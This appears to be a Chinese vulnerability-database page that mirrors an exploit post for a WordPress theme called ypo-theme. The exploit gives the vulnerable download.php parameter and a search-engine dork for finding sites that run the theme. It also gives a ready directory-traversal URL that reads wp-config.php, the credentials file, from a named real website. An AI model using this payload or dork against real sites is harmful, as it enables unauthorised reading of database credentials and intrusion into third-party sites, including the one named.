wp-content themes ypo-theme Local File Disclosure Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1209765 漏洞类型
发布时间 2018-06-11 更新时间 2018-06-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060116
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:wp-content themes ypo-theme  Local File Disclosure Vulnerability
    
    # Date: 11/06/2018

    # Exploit Author: PrenS

    # Contact: https://www.spyhackerz.com/forum/members/prens.22/

    #Dostlar = Burtay,Torlak,Metalqear,Mectruy,Dümenci

      # Website: https://www.milw00rm.com - https://www.spyhackerz.com/forum/ -  http://www.imhatimi.org [3]


    vuln = wp-content/themes/ypo-theme/download.php?download=
    dork = inurl:wp-content/themes/ypo-theme
                      themes/ypo-theme

    Demo = http://www.nepeanvalleyeyesurgeons.com.au/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php